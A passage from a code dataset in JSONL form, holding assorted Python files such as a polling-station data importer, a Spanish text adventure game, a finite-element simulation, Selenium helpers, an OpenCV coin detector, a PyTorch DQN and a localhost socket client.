2JU\",\n \"BL4 8JA\",\n \"BL1 5DB\",\n \"BL1 3AU\",\n \"BL1 5HP\",\n \"BL1 3SJ\",\n \"BL1 2HZ\",\n \"BL3 2DP\",\n \"BL4 0LW\",\n \"BL4 7PQ\",\n \"BL5 2DL\",\n \"BL4 7BB\",\n \"BL3 1BA\",\n \"BL6 4ED\",\n \"BL6 6PX\",\n \"BL6 6HN\",\n \"BL3 6ST\",\n \"BL4 0HU\",\n \"BL5 3LT\",\n \"BL5 2JX\",\n \"BL5 2DJ\",\n ]:\n return None\n\n rec = super().address_record_to_dict(record)\n\n if record.addressline6.strip() == \"BL7 OHR\":\n rec[\"postcode\"] = \"BL7 0HR\"\n\n if record.addressline6.strip() == \"BL4 ONX\":\n rec[\"postcode\"] = \"BL4 0NX\"\n\n if record.addressline6.strip() == \"BL4 ONY\":\n rec[\"postcode\"] = \"BL4 0NY\"\n\n return rec\n","sub_path":"polling_stations/apps/data_importers/management/commands/import_bolton.py","file_name":"import_bolton.py","file_ext":"py","file_size_in_byte":2487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"426607288","text":"import random\nimport arcade\nclass jugadores:\n def __init__(self, millas, sed, cansancio, botella):\n self.millas = millas\n self.sed = sed\n self.cansancio = cansancio\n self.botella = botella\n\njugador = jugadores(0, 0, 0, 3)\ncobalto = jugadores(-50, 0, 0, 6)\n\n#def enemigos():\n# if cobalto.botella <= 0:\n# cobalto.botella = 0\n \n# else: \n# cobalto.millas += random.randint(7, 14)\n# cobalto.botella -= 1\n\n\ndef main ():\n done = False\n print(\"Bienvenido a Escorpión\")\n print(\"Has robado la montura más preciada del emperador, el escorpión ojos claros\")\n print(\"Te persigue la guardia de cobalto personal a través del desierto\")\n print(\"Sobrevive, escapa y continua tu vida como ladrón\")\n\n while not done:\n print(\"A. Beber de tu botella\")\n print(\"E. Hacia delante a velocidad moderada\")\n print(\"I. Adelante full velocidad\")\n print(\"O. 
Descansar por la noche\")\n print(\"U. Pasar\")\n print(\"Q. Salir\")\n\n opcion = input(\"Elija: \")\n\n if opcion == \"q\":\n done = True\n\n elif opcion == \"a\":\n if jugador.botella <= 0:\n print(\"Intentas beber pero te desesperas en el intento, pierdes un día\")\n cobalto.millas += random.randint(7, 14)\n else:\n print(\"Te sientes revitalizado\")\n jugador.botella -= 1\n jugador.sed = 0\n cobalto.millas += random.randint(7, 14)\n\n elif opcion == \"e\":\n desplazamiento = random.randint(5, 12)\n jugador.millas += desplazamiento\n print(\"Te mueves \", desplazamiento, \" millas, llevas en total unas \", jugador.millas, \" millas recorridas\")\n cobalto.millas += random.randint(7, 14)\n jugador.sed += 1\n jugador.cansancio += 1\n\n elif opcion == \"i\":\n desplazamiento = random.randint(10, 20)\n jugador.millas += desplazamiento\n print(\"Te mueves \", desplazamiento, \" millas, llevas en total unas \", jugador.millas,\n \" millas recorridas\")\n cobalto.millas += random.randint(7, 14)\n jugador.sed += random.randint(1, 2)\n jugador.cansancio += random.randint(1, 3)\n\n elif opcion == \"o\":\n jugador.cansancio = 0\n print(\"Descansais alegremente, os sentiís mucho mejor\")\n cobalto.millas += random.randint(7, 14)\n\n if jugador.sed >= 3 and jugador.sed < 5:\n print(\"Tenéis bastante sed\")\n\n elif jugador.sed >= 5:\n print(\"No podés aguantar más, moriís en medio del desierto\")\n done = True\n break\n\n if jugador.cansancio >= 5 and jugador.cansancio < 8:\n print(\"Tu grupo empieza a estar cansado\")\n\n elif jugador.cansancio >=8:\n print(\"No podeis más, con peso en vuestros cuerpos os desmallais, moriís por falta de sueño\")\n done = True\n break\n\n if cobalto.millas >= jugador.millas:\n print(\"Os han pillado, no podeis hacer nada, os ejecutan a golpe de lanza\")\n done = True\n break\n\n elif jugador.millas - cobalto.millas <= 15:\n print(\"Unas siluetas armadas aparecen en el horizonte\")\n\n if jugador.millas >= 200:\n print(\"Lo conseguisteis, habéis ganado\")\n done = True\n\nmain()\n","sub_path":"lab04-camel/Text-camel-game.py","file_name":"Text-camel-game.py","file_ext":"py","file_size_in_byte":3433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"437406193","text":"import numpy as np\n# 初始化三角形初始位置\n\nnode_num = 4\n\nnode_pos = np.array([[0,0],[1,0],[0,1],[1,1]],dtype = float)\n\nnode_dx = np.zeros((node_num,2))\n\nelement_num = 2\n\nelement = np.array([[0,1,2],[2,1,3]])\n\nelement_minv = np.zeros((element_num,2,2))\n\nelement_area = np.zeros((element_num))\n\nfor i in range(element_num):\n p0 = node_pos[element[i,0],:]\n p1 = node_pos[element[i,1],:]\n p2 = node_pos[element[i,2],:]\n \n Ds = np.array([[p1[0] - p0[0],p2[0] - p0[0]],[p1[1] - p0[1],p2[1] - p0[1]]])\n \n element_minv[i,:,:] = np.linalg.inv(Ds)\n\nnode_pos[1,0] = 0.2\n\n# https://www.continuummechanics.org/tensornotationbasic.html\ndef doubleDotProduct(A,B):\n return A[0,0]*B[0,0] + A[1,0]*B[1,0] + A[0,1]*B[0,1] + A[1,1]*B[1,1]\n\ntime = 0\ntimeFinal = 3000\nwhile(time < timeFinal):\n time += 1\n for i in range(element_num):\n p0 = node_pos[element[i,0],:]\n p1 = node_pos[element[i,1],:]\n p2 = node_pos[element[i,2],:]\n \n Ds = np.array([[p1[0] - p0[0],p2[0] - p0[0]],[p1[1] - p0[1],p2[1] - p0[1]]])\n # 形变梯度\n F = np.dot(Ds,element_minv[i,:,:])\n # lame常数\n mu = 1\n # lame常数\n la = 1\n \n pJpF = np.array([[F[1,1],-F[1,0]],[-F[0,1],F[0,0]]])\n J = max(0.01,np.linalg.det(F))\n logJ = np.log(J)\n I_c = F[0,0]**2 + F[1,1]**2\n energy = 0.5 * mu * (I_c - 
2) - mu * logJ + 0.5 * la * logJ**2\n piola = mu * (F - 1.0 / J * pJpF) + la * logJ / J * pJpF\n # Jminus = np.linalg.det(F) - 1.0 - mu / la\n # piola = mu * F + la * Jminus * pJpF\n # 三角形面积\n area = 0.5\n # 计算力\n mm = np.linalg.inv(element_minv[i,:,:])\n H = area * np.dot(piola,mm.transpose())\n \n gradC0 = np.array([H[0,0],H[1,0]])\n gradC1 = np.array([H[0,1],H[1,1]])\n gradC2 = np.array([-H[0,0]-H[0,1],-H[1,0]-H[1,1]])\n \n node_force = np.zeros((3,2))\n #第一个顶点\n node_force[0,:] = gradC0\n #第二个顶点\n node_force[1,:] = gradC1\n #第三个顶点\n node_force[2,:] = gradC2\n \n invMass = 1\n \n dt = 0.1\n sumGradC = invMass * (gradC0[0]**2 + gradC0[1]**2)\n sumGradC += invMass * (gradC1[0]**2 + gradC1[1]**2)\n sumGradC += invMass * (gradC2[0]**2 + gradC2[1]**2)\n \n if sumGradC < 1e-10:\n break\n \n node_dx[0,:] += dt * gradC0\n node_dx[1,:] += dt * gradC1\n node_dx[2,:] += dt * gradC2\n \n # node_dx[element[i,0],:] += energy / sumGradC * invMass * gradC0\n # node_dx[element[i,1],:] += energy / sumGradC * invMass * gradC1\n # node_dx[element[i,2],:] += energy / sumGradC * invMass * gradC2\n \n element_area[i] = np.cross(node_pos[1,:] - node_pos[0,:],node_pos[2,:] - node_pos[0,:])*0.5\n \n node_pos += dt * node_dx\n node_dx[:,:] = 0\n \n","sub_path":"FiniteElement/femcourse/neohookean.py","file_name":"neohookean.py","file_ext":"py","file_size_in_byte":2945,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"384386943","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Sep 20 18:44:13 2019\n\n@author: estruc-datos\n\"\"\"\n\nimport stack \n\n'''Realizar un programa que muestre la cantidad de elementos de una pila de enteros.\nMostrar y desapilar 2 elementos y volver a imprimir el tamaño de la pila.'''\n\npila = stack.Stack(4)\npila.push(2)\npila.push(4)\npila.push(6)\npila.push(8)\n\npila.imprimir()\nprint(\"La pila tiene\", pila.getSize(), \"elementos\")\nprint(\"Desapilamos los elementos\", pila.pop(), \"y\", pila.pop())\nprint(\"El nuevo tamaño es\", pila.getSize())\npila.imprimir()","sub_path":"trabajo-practico-4-5-pilas-colas/pila-ejercicio-2.py","file_name":"pila-ejercicio-2.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"140244229","text":"import os\nimport h5py\nimport numpy as np\nimport cv2\n\ndir_list = [r'D:/dataset/hand/0', r'D:/dataset/hand/1', r'D:/dataset/hand/2',\n r'D:/dataset/hand/3', r'D:/dataset/hand/4', r'D:/dataset/hand/5']\n\n\ndef image_2_h5():\n\n Y = []\n X = []\n\n for dir in dir_list:\n dirs = os.listdir(dir)\n print(len(dirs))\n\n num = 0\n print('begin to process data in ' + dir)\n for file in dirs:\n label = eval(dir[-1])\n\n Y.append(label)\n\n im = cv2.imread(dir+'/'+file)\n im = cv2.resize(im, (64, 64), interpolation=cv2.INTER_AREA)\n mat = np.asarray(im)\n X.append(mat)\n\n num += 1\n if num % 500 == 0:\n print('have process ' + str(num) + ' data point')\n print(label)\n\n file = h5py.File(r'D:/dataset/hand/data.h5', 'w')\n file.create_dataset('X', data=np.array(X))\n file.create_dataset('Y', data=np.array(Y))\n file.close()\n\n # test\n data = h5py.File(r'D:/dataset/hand/data.h5', 'r')\n X_data = data['X']\n print(X_data.shape)\n Y_data = data['Y']\n print(Y_data[2])\n cv2.imshow('test', X_data[2])\n if cv2.waitKey(0) & 0xFF == ord('q'):\n cv2.destroyAllWindows()\n\n\nif __name__ == '__main__':\n image_2_h5()\n","sub_path":"Test_Wheel/data to h5(仅储存相同尺寸图片及标签).py","file_name":"data to h5(仅储存相同尺寸图片及标签).py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"302378278","text":"from django.db import models\nfrom catalogues import models as catalog_models\n\n\nclass AssignedCars(models.Model):\n idCar = models.ForeignKey(\n catalog_models.Cars,\n on_delete=models.DO_NOTHING\n )\n idUser = models.ForeignKey(\n catalog_models.Users,\n on_delete=models.DO_NOTHING\n )\n\n class Meta:\n unique_together = ('idCar', 'idUser')\n db_table = 'AssignedCar'\n\n\nclass UsedCar(models.Model):\n expiration = models.DateTimeField()\n idAssignedCar = models.OneToOneField(\n AssignedCars,\n on_delete=models.DO_NOTHING,\n primary_key=True\n )\n\n class Meta:\n db_table = 'UsedCar'\n","sub_path":"control/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"621353197","text":"from robot.libraries.BuiltIn import BuiltIn\n\nfrom src.main.pages.BasePage import BasePage\nfrom src.main.utils.Utils import Utils\n\n\ndef _seleniumlib():\n return BuiltIn().get_library_instance(\"Selenium2Library\")\n\n\nlocators = {\"interests_block\": \"xpath=//div[@id='interestsId']\",\n \"how_did_you_hear_dropdown\": \"xpath=//select[@id='ProfileQuestion1']\",\n \"what_is_your_age_dropdown\": \"xpath=//select[@id='ProfileQuestion2']\",\n \"generally_do_you_travel_dropdown\": \"xpath=//select[@id='ProfileQuestion3']\",\n }\n\n\nclass AboutYourself(object):\n def __init__(self, interests_block_locator=locators[\"interests_block\"],\n how_did_you_hear_locator=locators[\"how_did_you_hear_dropdown\"],\n what_is_you_age_locator=locators[\"what_is_your_age_dropdown\"],\n generally_do_you_travel_locator=locators[\"generally_do_you_travel_dropdown\"], ):\n self.interests_block_locator = interests_block_locator\n self.how_did_you_hear_locator = how_did_you_hear_locator\n self.what_is_you_age_locator = what_is_you_age_locator\n self.generally_do_you_travel_locator = generally_do_you_travel_locator\n\n def select_all_interests(self):\n self.ten_elements_should_be_present_in_interests_block()\n BasePage().select_all_checkboxes_in_block(self.interests_block_locator)\n\n def select_how_did_you_hear_about_us(self, text='Google and other Search'):\n return BasePage().select_value_in_dropdown_by_text(self.how_did_you_hear_locator, text)\n\n def select_what_is_you_age_group(self, text='80+'):\n return BasePage().select_value_in_dropdown_by_text(self.what_is_you_age_locator, text)\n\n def select_generally_do_you_travel(self, text='Travel Solo'):\n return BasePage().select_value_in_dropdown_by_text(self.generally_do_you_travel_locator, text)\n\n def select_interests_and_questions(self):\n self.select_all_interests()\n self.select_how_did_you_hear_about_us()\n self.select_what_is_you_age_group()\n self.select_generally_do_you_travel()\n\n def ten_elements_should_be_present_in_interests_block(self):\n labels = BasePage().get_all_text_from_webelements_list(self.interests_block_locator + \"//label\")\n Utils().print_list(labels)\n expected_labels = ['Bird Watching', 'Cultural Travel', 'Gourmet Dining', 'Kayaking', 'Photography',\n 'Rain Forest Exploration', 'Scuba/Snorkeling/Swimming', 'Walking/Hiking',\n 'Whale Watching', 'Wildlife Observation',\n ]\n Utils().print_list(expected_labels)\n BuiltIn().should_be_true(Utils().compare_lists(labels, expected_labels))\n","sub_path":"src/main/forms/AboutYourself.py","file_name":"AboutYourself.py","file_ext":"py","file_size_in_byte":2726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"581379690","text":"'''COIN STACK DETECTER USING OPENCV\r\n\tAuthor : Sai Kishore Swaminathan\r\n\tDate : 23/10/2019'''\r\nimport cv2\r\nimport numpy as np \r\nimport os\r\nfrom kde import kde \r\nimport matplotlib.pyplot as plt \r\nimport glob \r\n\r\n\r\nclass Solution:\r\n\tdef __init__(self,path):\r\n\t\tself.myPath = path\r\n\r\n\tdef resize_img(self,oriimg):\r\n\t\tW = 1000.\r\n\t\theight, width, depth = oriimg.shape\r\n\t\timgScale = W/(width*3)\r\n\t\tnewX,newY = oriimg.shape[1]*imgScale, oriimg.shape[0]*imgScale\r\n\t\treturn cv2.resize(oriimg,(int(newX),int(newY)))\r\n\r\n\tdef make_clustered_array(self,center_points, x_axis_clusters ):\r\n\t\tline_clusters = []\r\n\t\trelevant_clusters = np.array([i for i in x_axis_clusters if len(i)>1])\r\n\t\tif len(relevant_clusters) !=0 :\r\n\t\t\tfor i in relevant_clusters:\r\n\t\t\t\tselected = [j for j in center_points if j[0] in i]\r\n\t\t\t\tline_clusters.append(selected)\r\n\t\treturn line_clusters\r\n\r\n\tdef find_Lines(self):\r\n\t\tNo_of_images = len(glob.glob1(self.myPath,\"*.jpg\"))\r\n\t\tnumbers = np.arange(1,No_of_images+1)\r\n\r\n\t\tfor number in numbers:\r\n\t\t\toriimg = cv2.imread(self.myPath+\"\\Coins_img ({}).jpg\".format(number))\r\n\t\t\tnewimg = self.resize_img(oriimg)\r\n\t\t\t# print (newimg.shape)\r\n\t\t\tgray = cv2.cvtColor(newimg,cv2.COLOR_BGR2GRAY)\r\n\t\t\t# gray = cv2.medianBlur(gray,(5,5))\r\n\t\t\tgray = cv2.bilateralFilter(gray,13,60,60)\r\n\t\t\toutput = cv2.cvtColor(gray,cv2.COLOR_GRAY2BGR)\r\n\r\n\t\t\tCircles = cv2.HoughCircles(gray,cv2.HOUGH_GRADIENT,\r\n\t\t\t\t\t\t\t\t\t\t1,40,param1= 90,param2= 30,\r\n\t\t\t\t\t\t\t\t\t\tminRadius=0,maxRadius=0)\r\n\r\n\t\t\tif Circles is None:\r\n\t\t\t\tcv2.imshow(\"Vertical Lines\", output)\r\n\t\t\t\tcv2.waitKey(0)\r\n\t\t\t\tcv2.destroyAllWindows()\r\n\t\t\tif Circles is not None:\r\n\t\t\t\tDetected = np.uint16(np.around(Circles))\r\n\t\t\t\tcenters = []\r\n\t\t\t\tfor x,y,r in Detected[0,:]:\r\n\t\t\t\t\tcv2.circle(output,(x,y),r,(0,255,255),3)\r\n\t\t\t\t\tcv2.circle(output,(x,y),2,(255,0,0),2)\r\n\t\t\t\t\tcenters.append((x,y))\r\n\t\t\t\t\r\n\t\t\t\tX_axis_points = [i[0] for i in centers]\r\n\t\t\t\tclusters = kde(X_axis_points,bdw=3.5) \r\n\t\t\t\t#If the model isn't being accurate try tweaking the bdw \r\n\t\t\t\t\r\n\t\t\t\tline_clusters = self.make_clustered_array(centers,clusters)\r\n\r\n\t\t\t\tfor i in line_clusters:\r\n\t\t\t\t\ti = np.array(i)\r\n\t\t\t\t\tX_1 = np.argmin(i[:,1])\r\n\t\t\t\t\tX_2 = np.argmax(i[:,1])\r\n\t\t\t\t\tcv2.line(output,tuple(i[X_1]),tuple(i[X_2]),(0,0,0),3)\r\n\r\n\t\t\t\tcv2.imshow(\"Vertical Lines\", output)\r\n\t\t\t\tplt.show()\r\n\t\t\t\tcv2.waitKey(0)\r\n\t\t\t\tcv2.destroyAllWindows()\r\n\t\treturn None \r\n\r\n\r\nif __name__ == '__main__':\r\n\t'''PLEASE ONLY USE PATHS TO IMAGE REPOSITORIES'''\r\n\r\n\t# myPath = os.getcwd()+\"\\COIN_IMAGES_NORMAL\"\r\n\tmyPath = os.getcwd()+\"\\COIN_IMAGES_RARE\"\r\n\tObj1 = Solution(myPath)\r\n\tObj1.find_Lines()\r\n\r\n","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":2576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"60570350","text":"'''\n\n**************\n* *\n* *\n* *\n**************\n\n'''\n\nimport pprint\n\ndef boxPrint(symbol, width, height):\n if len(symbol) != 1:\n raise Exception('\"symbol\" needs to be a string of length 1')\n if (width < 2) or (height < 2):\n raise Exception('\"width\" or \"height\" need to be greater than 1')\n print(symbol * width)\n \n\n for i in range(height - 2):\n print(symbol + (' ' * (width - 2)) + symbol)\n\n print(symbol * width)\n\nboxPrint('#', 10, 10)\n\n'''\n\ndef makeGrid(width, height):\n board = []\n \n for row in range(width):\n board.append([])\n for column in range(height):\n\n board[row].append(' ')\n pprint.pprint(board)\n\n\nmakeGrid(10,10)\n'''\n","sub_path":"boxprint.py","file_name":"boxprint.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"11645492","text":"#!/usr/bin/env python3\n# -*- encoding: utf-8 -*-\nimport random\nimport time\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options as ChromeOptions\nfrom selenium.webdriver.firefox.options import Options as FirefoxOptions\nfrom selenium.webdriver.remote.webelement import WebElement\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom webdriver_manager.firefox import GeckoDriverManager\nfrom webdriver_manager.opera import OperaDriverManager\n\n\nclass Base:\n ''' Base selenium\n\n Example:\n from selenium_library import Base\n\n session = Base(headless=False)\n session.open('https://www.google.de')\n input = session.element('[name=\"q\"]')\n session.click(input)\n session.send_keys(input, 'pipi')\n '''\n def __init__(\n self,\n options=None,\n browser='chrome',\n headless=True,\n window_width=1920,\n window_height=1080\n ):\n '''\n Init session vars\n\n Args:\n browser (str): Browser name\n headlesss (boolean): Hide browser\n window_width (int): Window width\n window_height (int): Window height\n '''\n self.browser = browser\n self.headless = headless\n self.options = options\n self.window_width = window_width\n self.window_height = window_height\n self.launch_browser()\n\n def launch_browser(self):\n '''Launch browser and create a session'''\n if self.browser == 'firefox':\n options = FirefoxOptions()\n else:\n options = ChromeOptions()\n\n if self.headless:\n options.add_argument('--headless')\n\n if self.options:\n for option in self.options:\n options.add_argument(option)\n\n window_size = '--window-size={},{}'.format(\n self.window_width,\n self.window_height\n )\n options.add_argument(window_size)\n\n if self.browser == 'firefox':\n self.session = webdriver.Firefox(\n executable_path=GeckoDriverManager().install(),\n firefox_options=options\n )\n elif self.browser == 'opera':\n self.session = webdriver.Opera(\n executable_path=OperaDriverManager().install(),\n options=options\n )\n else:\n self.session = webdriver.Chrome(\n ChromeDriverManager().install(),\n chrome_options=options\n )\n\n def open(self, url):\n '''Open a new url in the session'''\n self.session.get(url)\n\n def get_url(self):\n '''Get the current url from the session\n\n Returns:\n str: Current url\n '''\n return self.session.current_url\n\n def element(self, selector):\n ''' Try to find an element in dom\n\n Returns:\n [None, WebElement]: Element or None if no element was found\n '''\n try:\n return self.session.find_element_by_css_selector(selector)\n except Exception:\n pass\n\n def elements(self, selector):\n ''' Try to find every element in dom\n If there is no element it returns None\n\n Args:\n selector (str): DOM selector\n\n Returns:\n [None, list]: List of elements or None\n '''\n elements_list 
= self.session.find_elements_by_css_selector(selector)\n return (elements_list if len(elements_list) > 0 else None)\n\n def click(self, selector_or_element):\n '''Try to click on an element\n\n Args:\n selector_or_element [str, WebElement]\n '''\n el = None\n if type(selector_or_element) == 'str':\n el = self.element(selector_or_element)\n\n if isinstance(el, WebElement):\n el.click()\n\n def get_text(self, selector_or_element):\n '''Try to get text\n\n Args:\n selector_or_element [str, WebElement]\n\n Returns:\n str: Text from an element\n '''\n el = None\n if type(selector_or_element) == 'str':\n el = self.element(selector_or_element)\n\n if isinstance(el, WebElement):\n return el.text\n\n\n def send_keys(self, selector_or_element, keys):\n ''' Send keys to an element\n\n Args:\n selector_or_element [str, WebElement]\n keys (str): Keys to send\n '''\n el = None\n if type(selector_or_element) == 'str':\n el = self.element(selector_or_element)\n\n if isinstance(el, WebElement):\n el.send_keys(keys)\n\n def clear_keys(self, selector_or_element):\n '''Clear keys from element\n\n Args:\n selector_or_element [str, WebElement]\n '''\n if type(selector_or_element) == 'str':\n el = self.element(selector_or_element)\n\n if isinstance(el, WebElement):\n el.clear()\n\n def wait(self, seconds=1, is_random=False, min=1, max=10):\n '''Wait a specific time or random\n\n Args:\n seconds (int): Time to wait in seconds\n is_random (boolean): Generate seconds to wait via randint\n min (int): Minium time to wait if is_random is true\n max (int): Max time to wait if is_random is true\n '''\n time.sleep(random.randint(min, max) if is_random else seconds)\n\n def close(self):\n ''' Close the current session '''\n self.session.close()\n\n def __enter__(self):\n '''Will be executed when this class will be created via ContextMenu'''\n return self\n\n def __exit__(self, *args):\n ''' Will be executed when this class will be closed via ContextMenu '''\n self.close()\n","sub_path":"selenium_library/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":5710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"147601909","text":"import json\nfrom enum import Enum, unique\n\n\nclass Layout(object):\n pass\n\n\nclass GridFitLayout(Layout):\n type: str = \"grid_fit\"\n\n def __init__(self, row_count, column_count):\n self.row_count = row_count\n self.column_count = column_count\n\n def json(self) -> dict:\n return {\n \"type\": self.type,\n \"row_count\": self.row_count,\n \"column_count\": self.column_count\n }\n\n\n@unique\nclass ScrollDirection(str, Enum):\n vertical = \"vertical\"\n horizontal = \"horizontal\"\n\n\nclass GridScrollLayout(Layout):\n type: str = \"grid_scroll\"\n\n def __init__(self, direction: ScrollDirection, row_count: float, column_count: float):\n self.direction = direction\n self.row_count = row_count\n self.column_count = column_count\n\n def json(self) -> dict:\n return {\n \"type\": self.type,\n \"direction\": self.direction,\n \"row_count\": self.row_count,\n \"column_count\": self.column_count\n }\n","sub_path":"python/source/layout.py","file_name":"layout.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"596708739","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport torch\nimport torch.nn as nn\n\n\nclass DQN(nn.Module):\n def __init__(self, channels_in, num_actions):\n super(DQN, self).__init__()\n\n self.conv1 = 
nn.Conv2d(in_channels=channels_in,\n out_channels=32,\n kernel_size=8,\n stride=4)\n self.relu1 = nn.ReLU(True)\n self.conv2 = nn.Conv2d(in_channels=32,\n out_channels=64,\n kernel_size=4,\n stride=2)\n self.relu2 = nn.ReLU(True)\n self.conv3 = nn.Conv2d(in_channels=64,\n out_channels=64,\n kernel_size=3,\n stride=1)\n self.relu3 = nn.ReLU(True)\n self.flat = Flatten()\n self.fc4 = nn.Linear(in_features=64*7*7,\n out_features=512)\n self.relu4 = nn.ReLU(True)\n self.fc5 = nn.Linear(in_features=512,\n out_features=num_actions)\n\n\n def forward(self, x):\n \"\"\"\n Forward pass of the dqn. Should not be called\n manually but by calling a model instance directly.\n\n Inputs:\n - x: PyTorch input Variable\n \"\"\"\n\n x = self.conv1(x)\n x = self.relu1(x)\n x = self.conv2(x)\n x = self.relu2(x)\n x = self.conv3(x)\n x = self.relu3(x)\n x = self.flat(x) # change the view from 2d to 1d\n x = self.fc4(x)\n x = self.relu4(x)\n x = self.fc5(x)\n\n return x\n\n\n @property\n def is_cuda(self):\n \"\"\"\n Check if model parameters are allocated on the GPU.\n \"\"\"\n return next(self.parameters()).is_cuda\n\n\n def save(self, path):\n \"\"\"\n Save model with its parameters to the given path. Conventionally the\n path should end with \"*.model\".\n\n Inputs:\n - path: path string\n \"\"\"\n print('Saving model... %s' % path)\n torch.save(self.state_dict(), path)\n\n\n def load(self, path):\n \"\"\"\n Load model with its parameters from the given path. Conventionally the\n path should end with \"*.model\".\n\n Inputs:\n - path: path string\n \"\"\"\n print('Loading model... %s' % path)\n self.load_state_dict(torch.load(path, map_location=lambda storage, loc: storage))\n\n\nclass Flatten(nn.Module):\n def forward(self, input):\n return input.view(input.size(0), -1)\n","sub_path":"dqn.py","file_name":"dqn.py","file_ext":"py","file_size_in_byte":2513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"486616118","text":"import socket\n\nclient_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nclient_sock.connect(('127.0.0.1', 53210))\nprint(\"Если нужно прочитать файл с логами введите 1\")\nprint(\"Если нужно найти конкретные строки нажмите 2 и введите строку поиска\")\n\"\"\"\ndata = input(\"Введите значение: \")\nclient_sock.sendall(data.encode())\nprint(\" :Log message itself>\")\nif data == '2':\n data =input(\"Введите поисковое слово: \")\n client_sock.sendall(data.encode())\nclient_sock.sendall(data.encode())\n\"\"\"\n# client_sock.sendall(b'Hello, world')\nlines_index = []\n\nclient_sock.settimeout(1.0)\ndata1 = client_sock.settimeout(300)\n# data = client_sock.recv(1024)\n\ndef sandMessage(): #объявляем функцию для отправки и приема сообщений\n data = input(\"Введите значение: \")\n client_sock.sendall(data.encode()) #отправляем серверу сообщение в виде encode для нормальной декодировки со строны сервера\n #print(\" :Log message itself>\")\n if data == '2': #если введеное значение равно 2 то начинаем новый алгоритм для поискового запроса\n data = input(\"Введите поисковое слово: \")\n client_sock.sendall(data.encode()) #отправляем серверу поисковой запрос\n print(\" :Log message itself>\")\n while data != \"\": #пока полученные сообщения от сервера не пусты клиент прослушивает их\n data = client_sock.recv(1024) #прием сообщений\n print(data.decode(\"utf-8\")) #вывод их в терминал\n return sandMessage() #вызываем заново sandMessage для отправки значения и поскового запроса заново\n\nwhile True:\n sandMessage() #вызываем функцию 
sandMessage\nclient_sock.close()\n#print(lines_index)\n# print('Received', repr(data))\n","sub_path":"irusyaev/client1.py","file_name":"client1.py","file_ext":"py","file_size_in_byte":2381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"178185217","text":"import re\n\ntext = input()\nword_pattern = r\"(\\*{2}|\\:{2})(?P[A-Z][a-z][a-z]+)\\1\"\nwhole_pattern = r\"(?P(?P(\\*{2}|\\:{2}))[A-Z][a-z][a-z]+(?P=separator))\"\nthreshold = 1\n\nvalid_matches_word = [obj_1.groupdict() for obj_1 in re.finditer(word_pattern, text)]\nvalid_matches_whole = [obj_2.groupdict() for obj_2 in re.finditer(whole_pattern, text)]\n\nwords_only = []\ncool = []\n\nemojis = []\ncool_emojis = []\n\nfor el in valid_matches_word:\n words_only.append(el[\"word\"])\n\nfor element in text:\n if element.isdigit():\n threshold *= int(element)\n\nfor word in words_only:\n current_coolness = 0\n for letter in word:\n current_coolness += int(ord(letter))\n if current_coolness > threshold:\n cool.append(word)\n\nprint(f\"Cool threshold: {threshold}\")\nprint(f\"{len(words_only)} emojis found in the text. The cool ones are:\")\n\nfor element_1 in valid_matches_whole:\n emojis.append(element_1[\"whole\"])\nfor current_word in cool:\n for current_emoji in emojis:\n if current_word in current_emoji:\n cool_emojis.append(current_emoji)\n\nprint(*cool_emojis, sep=\"\\n\")\n","sub_path":"Fundamentals - Final Exams/Emoji Detector.py","file_name":"Emoji Detector.py","file_ext":"py","file_size_in_byte":1117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"58589771","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Nov 10 15:16:30 2017\nSmall program to read data from the Empatica.\n\n@author: Ilkka\n\"\"\"\n\nimport argparse\nimport random\nimport time\nimport sys\nimport socket\nimport signal\nimport datetime\n\nfrom pythonosc import osc_message_builder\nfrom pythonosc import udp_client\nfrom struct import *\nfrom my_utils import logWriter\n\nEMPATICA_ADDRESS = \"127.0.0.1\"\nEMPATICA_PORT = 9999\n\nADDRESS1 = \"192.168.0.130\"\n#ADDRESS1 = \"127.0.0.1\"\n\nPORT1 = 8001\n\n#OSCADDRESS = \"/empatica\"\n\n\n\nif __name__ == \"__main__\":\n# Attempt to ctrl-c work in windows.. 
